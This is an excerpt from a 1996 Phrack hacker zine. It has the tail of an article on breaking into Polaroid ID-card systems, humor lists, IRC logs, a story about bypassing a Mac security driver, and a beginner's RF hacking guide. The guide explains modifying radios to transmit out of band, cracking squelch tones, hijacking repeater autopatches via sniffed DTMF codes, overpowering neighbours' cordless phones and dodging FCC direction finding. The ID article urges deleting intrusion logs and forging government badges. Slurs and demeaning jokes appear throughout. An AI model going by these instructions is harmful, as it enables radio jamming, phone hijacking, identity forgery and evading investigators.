Call 1-800-343-5000 for more Names =)



Part Four: What to Do once you get in

Now that your in you have access to all of their database records and
photos.  Upload your own and have fun with it! Everything you do is
logged so here's what you'll want to do when you're done making yourself
an official FBI agent or an employee of the federal reserve. Go to all
of the available drives which could be a lot since they are on a network
and do a search from root for all of the LOG files i.e. C:DIR /S *.LOG
Then delete the fuckers!!!! You can also do this by FDISK or formatting.
Just kidding! But if you want to do it the right way then go to the
admin screen and purge the error and system logs.

Basically if you want the form for government badges or the FBI agents
database this is the safest way to go. These computer do not have the
ability to trace but it does not mean the phone company doesn't! ANI
sucks a fat dick so remember to divert if you decide to do this. If you
don't know how to divert I recommend you read CoTNo or Phrack and learn
a little bit about phone systems and how they work.

Moving around in the software once your past the security is very simple
so I'm not going to get into it. If you can get around a BBS then you
don't need any further help. Just remember to delete or purge the logs.

Part Five: Closing

If your looking for some mild fun like uploading the DMV a new license
or revoking your friends this is the way to do it. However if you're
looking to make fake ID's I recommend you download the badge format and
purchase or obtain a copy of IDWare by Polaroid. IDware is a lot like
the 4000 software except you only need a scanner not the whole system.
As a warning to some of the kids I know of one guy who bought a
$50,000.00 ID4000 and paid it off in a year by selling fake ID's. When
Polaroid busted him they prosecuted to the fullest and now the guy is
rotting in a cell for 25 to 50 years. Just a thought to ponder.

Peace 
PiLL

Greetz
Shouts go out to the following groups and individuals: TACD, TNO, MOD,
L0pht, CDC, UPS, Shadow, Wraith, KaoTik, Wednesday, Zydirion, Voyager,
Jazmine, swolf, Mustard, Terminal, Major, Legion, Disorder, Genesis,
Paradox, Jesta, anybody else in 303, STAR, BoxingNuN, MrHades, OuTHouse,
Romen, Tewph, Bravo, Kingpin, and everyone I forgot cause I'm sure there
are a bunch of you, sorry =P.

                                ----<>----

 The Top Ten things overheard at PumpCon '96                   

10. "You gotta problem? Ya'll gotta rowl!"
               - Keith the security guard

 9. "My brain has a slow ping response" 
               - Kingpin

 8. "Space Rogue, I've been coveting your pickle."
               - espidre

 7. "If there's space -n shit, then it's Star Trek. Unless there's that
      little Yoda guy - then it's Star Wars" 
               - Kingpin

 6. "I'm the editor of Phrack. Wanna lay down with me?"
               - A very drunk unnamed editor of Phrack

 5. "Let's go find that spic, b_, no offense"  
               - A drunk IP to b_.

 4. "I'm lookin for that fat fucker Wozz.  He's big, and got a green shirt,
     and glasses, and curly hair, just like you.  As a matta a fact, you
     gots similar characteristics!" 
               - A drunk IP to wozz.

 3. "He was passed out on the floor... so I pissed on him" 
               - An unknown assailant referring to IP       

 2. "It was the beginning and the end of my pimping career"
               - Kingpin referring to his escapade of getting paid
                 two dollars for sex.

 1. "French Toast Pleeeeze!"
               - Everyone 

 
                                ----<>----


       TOP 0x10 REASONS TO KICK && WAYS TO GET
         KICKED OUT OF #HACK (Revision 0.1.1)
                    By SirLance

0x0f asking for any information about any Microsoft products
0x0e talking about cars, girls, or anything unrelated to hacking
0x0d flooding with a passwd file contents
0x0c asking how to unshadow passwd
0x0b being on #hack, #warez and #hotsex at the same time
0x0a asking for ops
0x09 using a nick including words like 'zero' 'cool' 'acid' or 'burn'
0x08 asking if someone wants to trade accounts, CCs or WaR3Z
0x07 asking what r00t means
0x06 asking when the latest Phrack will be released
0x05 asking where to get or how to create a BOT
0x04 having the word BOT anywhere in your nick
0x03 having a nick like Br0KnCaPs and SpEak LiK3 Th4t all the time
0x02 asking for flash.c or nuke.c, spoof.c, ipsniff.c or CrackerJack
0x01 thinking #hack is a helpdesk and ask a question
0x00 being on from AOL, Prodigy, CompuServe, or MSN

                   -EOL-

        
                                ----<>----

                             International business
                                    by HCF


Friday, 3:00am 4.12: 
	I get the call:

	Julie:	"You break into computers right...?"
	Dover:	"Yea, what kind..."
	Julie:	"Mac, I think."
	Dover:	"Hmm... Call ``HCF'' at 213.262-XXXX"
	Julie:	"Uh, will he be awake...?"
	Dover:	"Don't worry (snicker) he'll be awake."

Friday, 4:00am 4.12
	HCF called me at 4am after he got the call from Julie:

	HCF:	"you got me into this mess, I need to barrow your car."
	Dover:	"Umm shure.  Ok..."
	HCF:	"I'll be right over..."

Friday, 12:30pm 4.12: upon returning the car:

	HCF: 	"Umm, got a parking ticket, I'll write you a check later..."

(I never got the check.)

Kathleen's comment to Julie which was passed to me (days later):

	Kath:	"Why didn't you tell me he was cute, I want him for myself!"

When I passed this on to HCF:

	HCF:	"She is *gorgeous* but not without a wet suit..."



	Here is the story that happened early one Friday morning...  The names
have been changed to protect the innocent, the guilty, and the innocent-looking
guilty....

I was reading up on a new firewall technology, the kind that locks
addresses out of select ports based on specific criterion, when the phone
rang.

"Hello?"
The voice of a women, between 18 and 30, somewhat deep like Kathleen
Turner's, said, "Uh, hello..."

There was an obvious pause.  It seemed she was surprised that I was so
awake and answered sharply on the second ring.  It was in the middle of my
working hours; 3:30 AM. There was no delay in the phone's response, no
subtle click after I picked up, and the audio quality was clear.

"Do you hack?"  she asked.

Recorder on.  Mental note: *stop* getting lazy with the recorder.

"No.  Are you on a Cell phone?" I responded
"No."
"Are you using a portable battery operated telephone?"
"No.  I was told by my friend ..."
"Are you in any way associated with local, federal or state law enforcement
agencies?"
"Oh, I get it.  No I'm not.  Julie said that you could help me."

I knew Julie through a mutual friend.

"Could you call me back in 5 minutes."
"Well, um, ok."

Throughout the whole conversation, the phones on her end were ringing off
the hook.  As soon as I hung up, Ben, the mutual friend, called.  Julie had
called him first, and he gave her my number.  I got his reassurance that
this was legit.  Ben was snickering but wouldn't divulge what it was about.
By now my curiosity was piqued.

The phone rang again, "I need someone who can break into a computer."
"Whose computer?"
"Mine."

It turns out that the woman had hostility bought out the previous owner of
this business.  The computer in question had both a mission-critical
database of some sort and a multi-level security software installed.  She
had been working under a medium permission user for some time.  The
computer crashed in such a way as to require the master password (root) in
order to boot.  The pervious owner moved out of town, could not be
contacted, and was most likely enjoying the situation thoroughly.  The
woman was unaware of any of the technical specifications or configuration
of the machine.  I was able to find out that it was a Apple Macintosh Color
Classic; a machine primarily distributed in Japan.  It would be around
10:00 AM in Tokyo.

"Why are the phones ringing so often at this time of the morning?" I asked.
"I do a lot of international business."

I was intrigued, the answer was smoothly executed without a delay or pitch
change.  I took the job.

Upon arriving, I was greeted by a young, stunningly beautiful, woman with
long, jet-black hair and stressed but clear green eyes.  I checked the room
for obvious bugs and any other surveillance.  There were calendars on the
wall, filled out with trixy and ultra-masculine sounding names like Candy
and Chuck.  The phones had died down some. The machine in question was
obviously well integrated into the environment; dust patterns, scratch
marks, worn-out mouse pad;  it had been there for some time.  There was a
PBX, around 6 to 8 voice lines, three phones, and no network, modem or
outside connectivity.

The security, which we'll call VileGuard, defeated all the "simple" methods
of by-passing.  None of the standard or available passwords, in any case or
combination, worked.  A brute-force script would be slow as second failure
shut the machine down.

I made a SCSI sector copy onto a spare drive and replaced it with the
original.  This involved tearing open the machine, pulling various parts
out, hooking up loose wires, merging several computers, and turning things
on in this state.  Trivial and routine, I did it rapidly and with both
hands operating independently.  For those who have never opened the case of
an all-in-one Mac, it involves a rather violent looking smack on both sides
of the pressure fitted case backing, appropriately called "cracking the
case."  This did not serve well to calm the nerves of the client.  After a
few moments of pallor and little chirps of horror, she excused herself from
the room.

While the SCSI copy preceded, I overheard her taking a few calls in the
other room.  What I heard was a one-sided conversation, but I could pretty
much fill in the blanks,

"Hello, Exclusive Escorts, may I help you?"
"Would you like to be visited at your home or at a hotel?"
"Well, we have Suzy, she's a 5'4" Asian lady with a very athletic body.
Very shy but willing, and very sensual, she measures 34, 24, 34."
"Big what?  Sir, you'll have to speak a little clearer."
"Oh, I see, well we have a very well endowed girl named Valerie, she's a
double D and measures 38, 24, 34.  Would that be more to your liking?"

It was not easy to keep from busting up laughing.

"He wants you to do what?  Well, charge him double."

With the new drive installed, and to predictable results, I fired up a hex
editor. My experience has been that full-disk encryption typically slows
the machine down to the point where the user disables it.  At around
$5C9E8, I found, "...507269 6E74204D 616E6167 65722045 72726F72...
...Print Manager Error..." in plain text.  I searched for some of the
known, lower permission, passwords.  I found a few scattered around sector
$9b4.  The hex editor I was using could not access the boot or driver
partitions, so I switched to one that could.  It's not as pretty of an
interface as the last editor, and is rather old.  Its saving grace though
is that it doesn't recognize the modern warnings of what it can and cannot
see.  There it was, VileGuard; driver level security.

"Eric is endowed with eight and has a very masculine physique."

Every male was "endowed with eight," every female had relatively identical
measurements.

I hunted fruitlessly around the low sectors for what might be the master
password.  All awhile wishing the find function of the editor would accept
regexp.  All the other passwords were intercapped on the odd character, but
that was a convention of the current owner, and not necessarily used by the
past owner.

"Oh, you want a girl that is fluent in Greek?"

It's not professional for me, and not good salesmanship for her, to have me
overheard laughing myself into anoxia.  After trying to straighten up and
gather my wits together again, I began to consider an alternate
possibility.  If I don't know the password, what happens if I make it so
that the driver doesn't either.  Return to the first-installed condition
perhaps? It was a thought.  It turned out to be a bad thought, resulting in
my haphazardly writing "xxxx" over, pretty much, random sectors of the
driver partition.

"Oh yes sir, Roxanne prefers older men.  She appreciates how very
experienced they are.  I understand sir, and I'm sure she can help you with
that."

Before I made a second copy and whipped out the RE tools, TMON and MacNosy,
I tried booting. The results were, as you'd expect, that the disk didn't
mount.  Instead, it asked me if I wanted to reinitialize the disk.  Pause.
Think... ya, why not. This was most definitely farther than I had gotten
with the secure driver installed and functional.  I canceled and fired up
one of many disk formatters I had on hand.  Though the formatter wasn't the
slickest, it had proven itself repeatedly in the past.  Its main quality
was that of writing a driver onto a disk that is in just about *any*
condition.  It's made by a French drive manufacturer.  As dangerous as this
behavior is, I'm sure it's a planned feature.  It could see the drive and
allowed me to "update" the driver.  A few seconds later, a normal
"finished" dialog.

"Yes, Stan carries a set of various toys with him.  No, I don't believe he
normally carries that, but I'm sure if you ask him nicely, he'll drop by
the hardware store on his way and pick one up."

I rebooted.  It worked.  I copied over the disk's data and reformatted.
Time to try it on the original drive (I had, of course, been working on my
copy.)  Upon startup, before anything could be accessed, "Please input the
master password..."

Puts an unusual twist on the phrase, "adverse working conditions"

- HCF

Note 1: Payment was in currency.
Note 2: If you ever think you understand the opposite sex's view on sex,
you're underestimating.


                                ----<>----


	The Beginners Guide to RF hacking

		by Ph0n-E of BLA & DOC


     Airphones suck.   I'm on yet another long plane ride to some
wacky event.  I've tried dialing into my favorite isp using this lame GTE
airphone, $15 per call no matter how long you "talk".  In big letters it
says 14.4k data rate, only after several attempts I see the very fine
print, 2400 baud throughput.  What kind of crap is that?  A 14.4 modem that
can only do 2400?  It might be the fact they use antiquated 900MHz AM
transmissions.  The ATT skyphones that are now appearing use imarsat
technology, but those are $10/minute.  Anyway they suck, and I have an
hour or so before they start showing Mission Impossible so I guess I'll
write this Phrack article Route has been bugging me about.

   There are a bunch of people who I've helped get into radio stuff, five
people bought handheld radios @ DefCon...  So I'm going to run down some
basics to help everyone get started.  As a disclaimer, I knew nothing about
RF and radios two years ago.  My background is filmmaking, RF stuff is just
for phun.

   So why the hell would you want to screw around with radio gear?  Isn't it
only for old geezers and wanna be rentacops?  Didn't CB go out with Smokey
& the Bandit?  

Some cool things you can do:

   Fast-food drive thrus can be very entertaining, usually the order taker
is on one frequency and the drivethru speaker is on another.  So you can
park down the block and tell that fat pig that she exceeds the weight
limit and McDonalds no longer serves to Fatchix.  Or when granny pulls up
to order those tasty mcnuggets, blast over her and tell the nice MCD slave
you want 30 happy meals for your trip to the orphanage.  If you're lucky
enough to have two fast food palaces close to each other you can link them
together and sit back and enjoy the confusion.

   You've always wanted a HERF gun, well your radio doubles as a small
scale version.  RF energy does strange and unpredictable things to 
electronic gear, especially computers.  The guy in front of me on the plane
was playing some lame game on his windowz laptop which was making some very 
annoying cutey noises.  He refused to wear headphones, he said "they mushed 
his hair...".  Somehow my radio accidentally keyed up directly under his
seat, there was this agonizing cutey death noise and then all kinds of cool
graphics appeared on his screen, major crash.  He's still trying to get it
to reboot.

   Of course there are the ever popular cordless phones.  The new ones work
on 900MHz, but 90% of the phones out there work in the 49MHz band.  You can
easily modify the right ham radio or just use a commercial low band radio
to annoy everyone.  Scanning phone calls is OK, but now you can talk back,
add sound effects, etc...  That hot babe down the street is talking to
her big goony boyfriend, it seems only fair that you should let her know
about his gay boyfriend.  Endless hours of torture.

   You can also just rap with your other hacker pals (especially useful 
cons). Packet radio, which allows you up to 9600 baud wireless net 
connections, its really endless in its utility.

How to get started:

   Well you're supposed to get this thing called a HAM license.  You take 
this test given by some grampa, and then you get your very own call sign.
If you're up to that, go for it.  One thing though, use a P.O. box for your
address as the feds think of HAMs as wackos, and are first on the list when
searching for terrorists.  Keep in mind that most fun radio things are 
blatantly illegal anyway, but you're use to that sort of thing, right?

   If you are familiar with scanners, newer ones can receive over a very
large range of frequencies, some range from 0 to 2.6 GHz.  You are not going
to be able to buy a radio that will transmit over that entire spectrum.  There
are military radios that are designed to sweep large frequencies ranges for
jamming, bomb detonation, etc. - but you won't find one at your local radio
shack.

A very primitive look at how the spectrum is broken down into sections:

  0 - 30MHz (HF)  Mostly HAM stuff, short-wave, CB.
 30 - 80MHz (lowband)  Police, business, cordless phones, HAM
 80 - 108MHz (FM radio)  You know, like tunes and stuff
110 - 122MHz (Aircraft band) You are clear for landing on runway 2600
136 - 174MHz (VHF)  HAM, business, police
200 - 230MHz Marine, HAM
410 - 470MHz (UHF), HAM, business
470 - 512MHz T-band, business, police
800MHz cell, trunking, business
900MHz trunking, spread spectrum devices, pagers
1GHZ+ (microwave) satellite, TV trucks, datalinks

   Something to remember, the lower the frequency the farther the radio waves
travel, and the higher the frequency the more directional the waves are.

   A good place to start is with a dual band handheld.  Acquire a Yaesu
FT-50.  This radio is pretty amazing, its very small, black and looks cool.
More importantly it can easily be moded.  You see this is a HAM radio, it's
designed to transmit on HAM bands, but by removing a resistor and solder
joint, and then doing a little keypad trick you have a radio that transmits 
all over the VHF/UHF bands.  It can transmit approximately 120-232MHz and 
315-509MHz (varies from radio to radio), and will receive from 76MHz to about
1GHz (thats 1000MHz lamer!), and yes that *includes* cell phones.  You also 
want to get the FTT-12 keypad which adds PL capabilities and other cool stuff
including audio sampling.  So you get a killer radio, scanner, and red box all
in one! Yaesu recently got some heat for this radio so they changed the eprom
on newer radios, but they can modified as well, so no worries.

   Now for some radio basics.  There are several different modulation schemes,
SSB - Single Side Band, AM - Amplitude Modulation, FM - Frequency Modulation,
etc.  The most common type above HF communications is NFM, or Narrow band 
Frequency Modulation.

There are three basic ways communication works:

Simplex - The Transmit and Receive frequencies are the same, used for short
distance communications.

Repeater - The Transmit and Receive frequencies are offset, or even on
different bands.

Trunking - A bunch of different companies or groups within a company share
multiple repeaters.  If you're listening to a frequency with a scanner and
one time its your local Police and the next it's your garbage man, the fire
dept... - that's trunking.  Similar to cell phones you get bits and pieces 
of conversations as calls are handed off among repeater sites.

   Their radios are programmed for specific "talk groups", so the police only
hear police, and not bruno calling into base about some weasel kid he found
rummaging through his dumpsters.  There are three manufacturers - Motorola,
Ericsson (GE), and EF Johnson.  EFJ uses LTR which sends sub-audible codes 
along with each transmission, the other systems use a dedicated control 
channel system similar to cell phones.  Hacking trunk systems is an entire 
article in itself, but as should be obvious, take out the control channel 
and the entire system crashes (in most cases).

   OK so you got your new radio you tune around and your find some security
goons at the movie theater down the street.  They are total losers so you
start busting on them.  You can hear them, but why they can't hear you?
The answer-- SubAudible Tones.  These are tones that are constantly
transmitted with your voice transmission - supposedly subaudible, but if
you listen closely you can hear them.  With out the tone you don't break
their squelch (they don't hear you.)  These tones are used keep nearby
users from interfering with each other and to keep bozos like you from
messing with them.  There are two types, CTCSS Continuos Tone-Codes Squelch
system (otherwise known as PL or Privacy Line by Motorola) or DCS Digital
Coded Squelch (DPL - Digital Privacy Line).  If you listened to me and got
that FT-50 you will be styling because its the only modable dual band that
does both.  So now you need to find their code, first try PL because its
more common.  There is a mode in which the radio will scan for tones for
you, but its slow and a pain.  The easiest thing to do is turn on Tone
Squelch, you will see the busy light on your radio turn on when they are
talking but you wont hear them.  Go into the PL tone select mode and tune
through the different tones while the busy light remains on, as soon as you
hear them again you have the right tone, set it and bust away!  If you
don't find a PL that works move on to DPL.  There is one other squelch
setting which uses DTMF tone bursts to open the squelch, but its rarely
used, and when it is used its mostly for paging and individuals.

   Now you find yourself at Defcon, you hear DT is being harassed by
security for taking out some slot machines with a HERF gun, so you figure
it's your hacker responsibility to fight back.  You manage to find a
security freq, you get their PL, but their signal is very weak, and only
some of them can hear your vicious jokes about their moms.  What's up?  They
are using a repeater.  A handheld radio only puts out so much power,
usually the max is about 5 watts.  That's pretty much all you want radiating
that close to your skull (think brain tumor).  So a repeater is radio that
receives the transmissions from the handhelds on freq A and then
retransmits it with a ton more watts on freq B.  So you need to program
your radio to receive on one channel and transmit on another.  Usually
repeaters follow a standard rule of 5.0MHz on UHF and .6MHz on VHF, and
they can either be positive or negative offsets.  Most radios have a
auto-repeater mode which will automatically do the offset for you or you
need to place the TX and RX freqs in the two different VCOs.  Government
organizations and people who are likely targets for hacks (Shadow Traffic
news copter live feeds) use nonstandard offsets so you will just need to
tune around.

   Some ham radios have an interesting feature called crossband repeat.
You're hanging out at Taco Bell munching your Nachos Supreme listening to the
drive thru freq on your radio.  You notice the Jack in the Box across the
street, tuning around you discover that TacoHell is on VHF (say 156.40) and
Jack in the Crack is on UHF (say 464.40).  You program the two freqs into
your radio and put it in xband repeat mode.  Now when someone places their
order at Taco they hear it at Jacks, and when they place their order at
Jacks they hear it at Taco.  When the radio receives something on 156.40 it
retransmits it on 464.40, and when it receives something on 464.40 it
retransmits it on 156.40.

"...I want Nachos, gimme Nachos..."  
"...Sorry we don't have Nachos at Jack's..." 
"...Huh? Im at Taco Bell..."  
Get it?  Unfortunately the FT-50 does not do xband repeat, that's the only 
feature it's lacking.

   Damn it, all this RF hacking is fun, but how do I make free phone calls?
Well you can, sort of.  Many commercial and amateur repeaters have a
feature called an autopatch or phonepatch.  This is a box that connects the
radio system to a phone line so that you can place and receive calls.  Keep
in mind that calls are heard by everyone who has their radio on! The
autopatch feature is usually protected by a DTMF code.  Monitor the input
freq of the repeater when someone places a call you will hear their dtmf
digits - if you're super elite you can tell what they are by just hearing
them, but us normal people who have lives put the FT-50 in DTMF decode mode
and snag the codez...  If your radio doesn't do DTMF decode, record the audio
and decode it later with your soundblaster warez.  Most of the time they
will block long-distance calls, and 911 calls.  Usually there is a way
around that, but this is not a phreaking article.  Often the repeaters are
remote configurable, the operator can change various functions in the field
by using a DTMF code.  Again, scan for that code and you too can take
control of the repeater.  What you can do varies greatly from machine to
machine, sometimes you can turn on long-distance calls, program speed-dials,
even change the freq of the repeater.

   What about cordless phones, can't I just dial out on someone's line?
Sort of.  You use to be able to take a Sony cordless phone which did
autoscanning (looked for an available channel) drive down the block with
the phone on until it locked on to your neighbors cordless and you get a
dialtone.  Now cordless phones have a subaudible security tone just like PL
tones on radios so it doesn't work anymore.  There are a bunch of tones and
they vary by phone manufacturer, so it's easier to make your free calls other
ways.

   But as I mentioned before you can screw with people, not with your FT-50
though.  Cordless phones fall very close to the 6 meter (50MHz) HAM band and
the lowband commercial radio frequencies.  There are 25 channels with the
base transmitting 43-47MHz and the handset from 48-50MHz.  What you want to
do is program a radio to receive on the base freqs and transmit on the
handset freqs.  The phones put out a few milliwatts of power (very little).
On this freq you need a fairly big antenna, handhelds just don't cut it - 
think magmount and mobile.  There are HAM radios like the Kenwood TM-742A 
which can be modified for the cordless band, however I have not found a 
radio which works really well receiving the very low power signals the 
phones are putting out.   So, I say go commercial!  The Motorola 
Radius/Maxtrac line is a good choice.  They have 32 channels and put out 
a cool 65watts so your audio comes blasting out of their phones.  Now 
the sucko part, commercial radios are not designed to be field 
programmable.  There are numerous reasons for this, mainly they just want 
Joe rentalcop to know he is on "Channel A" , not 464.500.  Some radios are 
programmed vie eproms, but modern Motorola radios are programmed via a 
computer.  You can become pals with some guy at your local radio shop and 
have him program it for you.  If you want to do it yourself you will need
a RIB (Radio Interface Box) with the appropriate cable for the radio, and
some software.  Cloned RIB boxes are sold all the time in rec.radio.swap 
and at HAM swap meets.  The software is a little more difficult, Motorola 
is very active in going after people who sell or distribute thier software
(eh, M0t?) They want you to lease it from them for a few zillion dollars.
Be cautious, but you can sometimes find mot warez on web sites, or at HAM
shows.   The RIB is the same for most radios, just different software, you
want Radius or MaxTrac LabTools.  It has built in help, so you should be 
able to figure it out.  Ok so you got your lowband radio, snag a 6 meter 
mag mount antenna, preferably with gain, and start driving around.  Put 
the radio in scan mode and you will find and endless amount of phone calls
to break into.  Get a DTMF mic for extra fun, as your scanning around listen
for people just picking up the phone to make a call.  You'll hear dialtone,
if you start dialing first since you have infinitely more power than the 
cordless handset you will overpower them and your call will go through.  
It's great listening to them explain to the 411 operator that their phone is
possessed by demons who keep dialing 411.  Another trick is to monitor the 
base frequency and listen for a weird digital ringing sound - these are tones
that make the handset ring.  Sample these with a laptop or a yakbak or
whatever and play them back on the BASE frequency (note, not the normal
handset freq) and you will make their phones ring.  Usually the sample won't
be perfect so it will ring all wacko.   Keep in mind this tone varies from
phone to phone, so what works on one phone wont work on another.

   Besides just scanning around how do you find freqs?  OptoElectronics
makes cool gizmos called near-field monitors.  They sample the RF noise
floor and when they see spikes above that they lock on to them.  So you
stick the Scout in your pocket, when someone transmits near you, the scout
reads out their frequency.  The Explorer is thier more advanced model which
will also demodulates the audio and decode PL/DPL/DTMF tones.  There are
also several companies that offer CDs of the FCC database.  You can search
by freq, company name, location, etc.  Pretty handy if your looking for a
particular freq.  Percon has cool CDs that will also do mapping.  Before
you buy anything check the scanware web site, they are now giving away
their freq databases for major areas.

  OK radioboy, you're hacking repeaters, you're causing all the cordless
phones in your neighborhood to ring at midnight, and no one can place 
orders at your local drivethrus.  Until one day, when the FCC and FBI 
bust down your door.  How do you avoid that??  OK, first of all don't 
hack from home.  Inspired people can eventually track you down.  How?
Direction Finding and RF Fingerprinting.  DF gear is basically a 
wideband antenna and a specialized receiver gizmo to measure signal 
strength and direction.  More advanced units connect into GPS units for 
precise positioning and into laptops for plotting locations and advance 
analysis functions such as multipath negations (canceling out reflected 
signals.)  RF finger printing is the idea that each individual radio has
specific characteristics based on subtle defects in the manufacture of the 
VCO and AMP sections in the radio.  You sample a waveform of the radio and
now theoretically you can tell it apart from other radios.  Doesn't really 
work though-- too many variables.  Temperature, battery voltage, age, 
weather conditions and many other factors all effect the waveform.  
Theoretically you could have a computer scanning around looking for a 
particular radio, it might work on some days. Be aware that fingerprinting
is out there, but I wouldn't worry about it *too* much.  On the other hand
DF gear in knowledgeable hands does work.  Piss off the right bunch of HAMS 
and they will be more than happy to hop in their Winnebego and drive all 
over town looking for you.  If you don't stay in the same spot or if you're 
in an area with a bunch of metal surfaces (reflections) it can be very very 
hard to find you.  Hack wisely, although the FCC has had major cutbacks 
there are certain instances in which they will take immediate action.  They 
are not going to come after you for encouraging Burger King patrons to become 
vegetarians, but if you decide to become an air-traffic controller for a day
expect every federal agency you know of (and some you don't) to come looking 
for your ass.

   My plane is landing so thats all for now,  next time - advanced RF hacking,
mobile data terminals, van eck, encryption, etc.


EOF


                                ----<>----


10.16.96

Log from RAgent

GrimReper: I work For Phrack
GrimReper: Yeah
GrimReper: I gotta submit unix text things like every month
GrimReper: I've been in Phrack for a long time
GrimReper: Phrack is in MASS
-> *grimreper* so how much does Phrack pay you?
*GrimReper** How much?
*GrimReper** Hmm......
*GrimReper** About $142
-> *grimreper* really
-> *grimreper* who paid you?
*GrimReper** w0rd
*GrimReper** CardShoot
*GrimReper** Cardsh00t
-> *grimreper* hmm, I don't see any "cardsh00t" in the credits for phrack
+48
*GrimReper** There is
-> *grimreper* you might as well stop lying before I bring in daemon9,
+he's another friend of mine
-> *grimreper* he's one of the editors of phrack
*GrimReper** Get the latest Phrack?
*GrimReper** Its gonna have my NN
*GrimReper** watch
-> *grimreper* not anymore
*GrimReper** Go Ahead
-> *grimreper* actually
*GrimReper** so?
-> *grimreper* you will be mentioned
-> *grimreper* you'll be known as the lying fuckhead you are, when this
+log goes in the next issue

        
                                ----<>----
10.24.96

Log from Aleph1

*** ggom is ~user01@pm1-6.tab.com (ggom)
*** on irc via server piglet.cc.utexas.edu ([128.83.42.61] We are now all
  piglet)
*ggom* i am assembling a "tool shed".  A "shed" for certain "expert" activity.
    Can you help?
-> *ggom* maybe... go on
*ggom* i represent certain parties that are looking for corporate information.
   this would fall under the "corporate espionage" umbrella
*ggom* this information could probably be obtained via phone phreak but access to
  corporate servers would be a plus...can you help?
-> *ggom* a) how do I know you are not a cop/fed? b) why did you come to #hack
  to ask for this? b) what type of data you after? c) what type of money are 
 you talking about?
*ggom* where else should i go to ask for this stuff????????
-> *ggom* you tell me.  How do you know about #hack?
*ggom* looked it up on the irc server...figured this was a good place to
  start...........     i am talking about 4 to 5 figures here for the information
-> *ggom* you are also talking 4 to 5 years
-> *ggom* #hack is visited regularly by undercovers and the channel is logged
-> *ggom* talking openly about such thing is not smart
*ggom* whatever...........  man, if you are GOOD, you are UNTRACEABLE.  i
  guess i am looking in the wrong place......
-> *ggom* you been watching way to many times "Hackers" and yes #hack is the
  wrong place...
*ggom* we are on a private channel.........suggest a more private setting....
-> *ggom* sorry you started off on a bad foot. If you got a million to spare
  for such information you would also have the resources to find the
  appropiate person to do the job. So you either are full off it, are a fed,
  or just plain dumb. This conversation ends here.
*ggom* later
*ggom* not talking a million.. talking 5 to 6 figures.........    you are
  right
*ggom* talk to me.......
*ggom* talk to me.......


                                ----<>----


--------------------------------------------------------------------------------


                              .oO Phrack 49 Oo.

                          Volume Seven, Issue Forty-Nine

                                    4 of 16

                           -:[ Phrack Pro-Phile ]:-
                   
   We discussed for a long time who in the hacking world today best 
exemplifies everything that is right with hacking today, and we came
up with a unanimous conclusion that it was Mudge.  And so we were quite
happy that our first choice for the first pro-phile that we have done
accepted our invitation.  He cracked your Apple warez when you couldn't, 
he wrote buffer overflows before they were cool, he owned your Sendmail 
(and probably still does), and he still manages to give more back to the 
community than anyone else around.  We can't say much more about him so
let's see what he has to say for himself...  

                                  Mudge
                                  ~~~~~

 Personal
 ~~~~~~~~
             Handle: mudge 
           Call him: Enough people know it that its not secret, if you know
                     it great, if not you probably don't have to. 
       Past handles: Many old Apple ][ crackers remember me by a different
                     handle.  That handle is long put to rest thanks to the
                     government.
      Handle origin: Mudge is a very common Irish last name.  Though I'm not
                     Irish I met someone with the name and couldn't believe
                     it was a proper name.  Out of homage to this person I
                     took it as a handle several years ago (and since I 
                     couldn't use the old one for legal reasons). 
      Date of Birth: Mid to Late '60s 
Age at current date: Mid to Late 20s 
             Height: 6'0"
             Weight: 150
          Eye color: Blue
         Hair Color: Brownish / dirty blonde and loooong
           Computer: MPP Risc machine with 16 processors, 4 processor i860
                     Cadmus, 2 Sparcs, my original Apple ][+, NeXT cube,
                     486, 4 Sun 3's, Textronix 4051, SouthWest Technical 
                     Products 75 
  Sysop/Co-Sysop of: Cell-Block, Magic Tavern, Co-Sysop on the old Circus
                     and Circus-II boards, ATDT, Works, and various AEs
                     scattered across the country.  And a little place
                     called the l0pht.
  Boards Frequented: Terrapin Station, Metal Shop, Black Crawling Systems, 
                     Used to hang on Rutgers' with the old Darpa people
                     (they know who they are) through telenet. 
        Net address: mudge@l0pht.com


Favorite Things
~~~~~~~~~~~~~~~
      Women: Not a big womanizer, when I hook up with someone it's usually
             for quite some time.  Though it's always nice when big companies
             try to bribe you other ways.  (Moreso 'cause it shows how sleazy
             the big companies are in comparison to human beings :>)
       Cars: Ford GT40, Porsche Wolf, Ferrari 318's, and of course a black
             SVT Cobra with black leather interior. 
      Foods: Beer
      Beers: Mateen Triple - with a runner up of Pilsner Urquell 
      Music: Frank Zappa, Dream Theater, Rush, Gentle Giant, King Crimson 
Instruments: Guitar.  I actually hold advanced degrees in music (hehe had
             to make some money so here I am back in the 'puter world).
    Guitars: Ibanez 7 string, Gibson es225 Jazzer, and a custom built Ibanez
             from an endorsement deal (which is signed by 2 porn stars)
      Books: Jack of Shadows, Roadmarks, Stranger in a Strange Land, 
             This Immortal, Steal this Urine Test, Steal this Book, PANIC -
             the wonderful Sparc buffer overflow writers bible.
   Turn Ons: Pet Rocks
  Turn Offs: 7/11 employees who think they can dance to Frank Zappa

Other Passions, Interests, Loves:

I love running the l0pht and the people that are involved in it.  There's
nothing like knowing that you are, at least attempting, to keep information
flowing and offering back to the community.  I love a lot of things.  It's
nice to see there is a sense of humor in the scene, and that there are still
enough old-school hackers that are willing to help if approached correctly
Granted there aren't enough of the older ones to answer every aol.com
e-mail...  It's a great feeling to be beneficial to both sides.  For instance:
when the 8.7.5 sploit went out and when we were doing a lot of work on SecureID
(which much to their schagrin we got *really* far) that both the people writing
the software and the hackers were happy to see our results.  It's all about
information and learning.  If you stop learning... you're not doing it right.
Unfortunately... it usually takes disseminating sploits to get some of the
large companies to fix their buggy software. 
  

Most Memorable Experiences
~~~~~~~~~~~~~~~~~~~~~~~~~~
Having a bunch of suits get out of, yes, K-cars and take away most of my
belongings - learning 6502 (and living it) assembler - writing my first
buffer overflow a few years back - the band cutting it's first audio CD -
playing the music for one of Hobbit's laser shows - having Wietse Venema
ask me "not" to break into bell labs at a talk he was giving - having the
bellcore author of the OTP RFC write me e-mail realizing that I had beaten
him to the punch with vulnerabilities - everyday that I spend with my
girlfriend - hearing one of the songs I wrote and played on being played
on the radio - The L0pht and it's people - everytime that you finish working
on a new project and it actually works [especially when you are working on
a hypothetical exploit and it pans out].


Some People to Mention
~~~~~~~~~~~~~~~~~~~~~~
Cheshire Catalyst for the initial inspiration.  The L0pht folks, Raven, 
Hobbit for being a flat out brilliant fucker, ReDragon (best sense of humor -
and best patience... look who he works for ;-)), Glyph - one nasty coder,  
Squarewave for providing countless hours of ooh's and aahhh's while 
